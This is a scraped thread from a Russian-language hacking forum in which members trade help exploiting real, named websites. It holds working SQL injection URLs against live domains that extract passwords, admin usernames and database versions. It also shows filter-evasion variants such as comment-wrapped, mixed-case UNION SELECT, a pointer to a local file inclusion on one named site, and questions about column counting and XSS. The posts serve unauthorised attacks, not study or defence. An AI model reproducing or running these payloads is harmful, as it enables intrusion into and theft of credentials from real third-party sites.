Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Anexroid

    Anexroid New Member

    Joined:
    22 Aug 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Может кто нибудь на примере объяснить?

    У формы action="?page=reg"
    2 поля
    допустим
    login
    pass

    В логин я пишу 123
    В пасс - 1 UNION ..........

    Вывод есть у 4,5 и 6-го поля.

    Как правильно вбить параметры в программу?

    и где proxy вписывать, а то не нашел?
    + допустим точно знаю, что есть таблицы users и news
     
    #14121 Anexroid, 14 Jul 2010
    Last edited: 14 Jul 2010
  2. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    website is vulnerable

    sql injection error is : Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'a' at line 1

    i use command order by and i got 23 columns but when i paste link in browser like this

    UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--

    page load normally and i can not see printable field

    can help me what i am doing mistake
     
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    *.php?id=1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--
    try to put(deliver) -
    *.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23--
     
    _________________________
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886


    linuxkernel это русскоязычный форум и здесь очень мало народа понимает что вы писали, следующий раз используйте онлайн транслиты или ваш пост будет удален.
    -------
    linuxkernel this is a russian board forum,and most of guys can't understand what u posted here,next time use online translators or your post will be deleted
     
    _________________________
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Подскажите какой лудше использовать брутер sql таблиц, полазил по форуму но ничего интиресного не нашел, из того что есть все както разплывчито обьесняется...
     
    _________________________
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    вы издеваетесь что ли? я же написал выше, не писать на английском!!!!

    linuxkernel и все кто хочет задавать такие вопросы ` hackforums.net, вам туда
    для этих целей используют SIPT
     
    _________________________
    #14126 Konqi, 14 Jul 2010
    Last edited: 14 Jul 2010
  7. boberko

    boberko New Member

    Joined:
    24 Jan 2009
    Messages:
    12
    Likes Received:
    2
    Reputations:
    0
    Прошу помощи:
    Нашел вроде скуль:
    _http://dovidka.if.ua/rubric.php?id=86'
    Но не могу подобрать колонки? в чем проблема?
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://dovidka.if.ua/rubric.php?id=-86+/*!UnIoN+SeLeCt*/+1,version(),3,4,5,6,7
     
    _________________________
  9. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16+from+pass
    
    помогите подобрать логин плз
     
  10. haito

    haito Banned

    Joined:
    27 May 2010
    Messages:
    23
    Likes Received:
    1
    Reputations:
    1
    Code:
    http://www.crossfitnb.com/archive.php?month=2009-03%20and%201=1
    Ошибка 403.

    А вот так:
    Code:
    http://www.crossfitnb.com/archive.php?month=2009-03 select union 1--+
    Работает.

    Как обойти?
     
  11. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://www.angusanddundee.co.uk/festive/events/event_detail.cfm?ID=1577+and+1=2+union+select+1,2,3,user_name,5,6,7,8,9,10,11,12,13,14,15,16+from+admin
     
  12. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    Code:
    http://www.crossfitnb.com/archive.php?month=-2009-03%27+Union+select+1,2,3,4,version(),6,7,8,9,10+--+
     
  13. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    всем привет!

    -->http://www.mobilex.pl/pas_brzuszny_wysoki_actimove_abdominal_wide.php?strona=wozkiinwalidzkie&id=-153/**/UnioN/**/SeLeCt/**/1,2,3,4,5,6,7,8%20+--+&stronaok=dysfunkcja%20uk%B3adu%20nerwowego

    не могу найти принтабельное поле...
     
  14. NaX[no]rT

    NaX[no]rT Members of Antichat

    Joined:
    3 Sep 2005
    Messages:
    489
    Likes Received:
    201
    Reputations:
    202
    там нет ничего
     
    _________________________
    1 person likes this.
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    можно вопрос? как вы узнали сколько там полей? спасибо.
     
    _________________________
  16. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    да как всегда, через order by по выводу ошибки:)

    -->Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/mobilex.pl/banery.php
     
  17. NaX[no]rT

    NaX[no]rT Members of Antichat

    Joined:
    3 Sep 2005
    Messages:
    489
    Likes Received:
    201
    Reputations:
    202
    id=-153 order by 8++&stronaok=dysfunkcja%20uk%B3adu%20nerwowego

    Здесь есть второй под запрос.

    http://www.mobilex.pl/istats5/login.php
    http://www.filipov.pl/istats5/index.php?p=admin - раскопаешь этот двиг = Profit!

    я уже LFI в нём нашёл http://www.mobilex.pl//istats5/winday.php?r=ololo
    Остальное за тобой.
     
    _________________________
    #14137 NaX[no]rT, 14 Jul 2010
    Last edited: 14 Jul 2010
  18. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    чтобы всё так просто было не постил бы
     
  19. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    вот и хотелось бы узнать, что я не так делаю, а не слушать тут пустые наезды и понты
     
  20. a1ertso

    a1ertso New Member

    Joined:
    16 Dec 2009
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Есть псивная xss в DLE.
    При открытии ее в строке,страница сворачивается и все. Как можно хотя бы, вывести алерт? Должен вылететь алерт с надписью xss... Но ничего не происходит.
     
Thread Status:
Not open for further replies.